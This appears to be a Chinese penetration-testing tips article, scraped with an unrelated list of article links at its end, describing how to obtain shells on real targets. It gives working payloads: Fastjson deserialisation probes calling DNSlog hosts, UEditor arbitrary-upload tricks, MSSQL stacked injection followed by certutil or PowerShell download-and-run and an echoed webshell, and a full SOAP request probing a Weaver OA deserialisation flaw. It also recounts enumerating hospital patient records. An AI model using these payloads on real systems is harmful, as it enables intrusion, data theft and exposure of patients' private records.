朴实无华(出现次数10)一般情况下拿shell最快的方法就是找上传,我们应该快速验证上传是否是基于后端的白名单校验 。如果是后端的白名单校验,在没有解析漏洞或是其它漏洞的组合下,我们应该放弃该接口 。需要注意的是我们在上传文件判断黑白名单时,上传的文件内容最好是无害的,否则可能会WAF干扰 。我们一定要清楚该次上传失败是因为程序本身的限制还是WAF的阻拦 。切忌对upload接口fuzz,雷声大雨点小 。
值得一提的是在统计的10次上传中,有一次在微信小程序,有一个swagger信息泄露upload接口,有一次在某银行的在线聊天系统,点击人工时,会出现传图片的按钮 。
客服系统:
文章插图
还有一个案例:
进入后台通过Kindeditor文件上传,又通过XXXX进行文件管理,有重命名功能,改为.php 。getshell 。
文件上传绕WAF的本质就是服务器与WAF对数据包解析的差异性,下面提供几个畸形数据包:
文章插图
Fastjson反序列化
也好用(出现次数6)判断是否为fastjson:报错抛出异常或是DNSlog
{"rand1":{"@type":"JAVA.net.InetAddress","val":"gbi7ge.dnslog.cn"}}{"rand2":{"@type":"java.net.Inet4Address","val":"gbi7ge.dnslog.cn"}}{"rand3":{"@type":"java.net.Inet6Address","val":"gbi7ge.dnslog.cn"}}遇见WAF:hex编码或是b:
文章插图
详见:
https://www.sec-in.com/article/950https://xz.aliyun.com/t/7568好用的tools:https://github.com/pmiaowu/BurpFastJsonScanhttps://github.com/wyzxxz/fastjson_rce_toolhttps://github.com/feihong-cs/JNDIExploit敏感信息泄露苍蝇再小也是肉(出现次数5)医院啊,这个比较多遇见的案例都是微信公众号或是小程序,遍历病例数据:
文章插图
文章插图
还遇见了swagger信息泄露构造接口查询:
文章插图
文章插图
UEditor1.4.3任意文件上传
出其不意(出现次数5)当遇见.NET的网站时,右键查看图片URL为~/ueditor~/upload/image/[20200101]这种年月格式/25位数字.png,就可以判断该站点使用了UEditor[直接目录扫描工具扫也行],就需要我们拼接出路径~/net/controller.ashx:
~前面可能不太固定需要自己在JS里找信息,或是合理猜测 。
提一嘴,之前遇见个站点.png?.aspx,站点返回了404,可以直接.png.aspx,同时UEditor有过滤?的特性,在有WAF的时候可酌情使用 。
文章插图
MSSQL堆叠注入
基操--os-shell后,得到一个命令行,一般是certutil下载执行或是powershell直接上线 。也可写入webshell:
找静态资源定位物理路径for /r C: %i in (*xxx*) do @echo %idir /s/a-d/b C:*xxx.xxxecho ^<一句话^> >C:phpstudy_proWWWshell.txt<>注意使用^转义
文章插图
文章插图
OA系统
没啥说的,有0day砸0day泛*OA,致*OA,通*OA,用*NC
github搜搜搜,内部自己有积累未批露利用点最好 。
泛*OA的两个案例用的WorkflowServiceXml反序列化比较丝滑 。
判断是否可利用:
POST /services%20/WorkflowServiceXml HTTP/1.1Host: xxxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0Accept: */*Accept-Encoding: gzip, deflateContent-Length: 523Content-Type: text/xml;charest=UTF-8<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn"><soapenv:Header/><soapenv:Body><web:doCreateWorkflowRequest><web:string><map><entry><url>http://m5alw5.dnslog.cn</url><string>http://m5alw5.dnslog.cn</string></entry></map></web:string><web:string>2</web:string></web:doCreateWorkflowRequest></soapenv:Body></soapenv:Envelope>
推荐阅读
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- |职场销售中报价的技巧,价格不应该随便说出口,如何给客户报价
- 三国曹仁曹洪和曹操什么关系?曹仁在三国演义中被谁击败过
- 三国演义中的孔明是诸葛亮吗?诸葛和孔明是一个人吗_2
- 治白头发最有效的秘方,中药治白发偏方秘方
- 护士|婆婆眼中理想儿媳职业排名,护士不再吃香,榜首是毕业生心头好
- 南瓜|罗缔发域分享生活中8个护发小妙招,你get了吗?
- 秋季吃什么美容养颜 中医五药膳美容护肤
- 保姆真难当?保姆工作
- 中考志愿服务的四大技巧
- 什么的诸葛孔明?三国演义中的孔明是诸葛亮吗_1
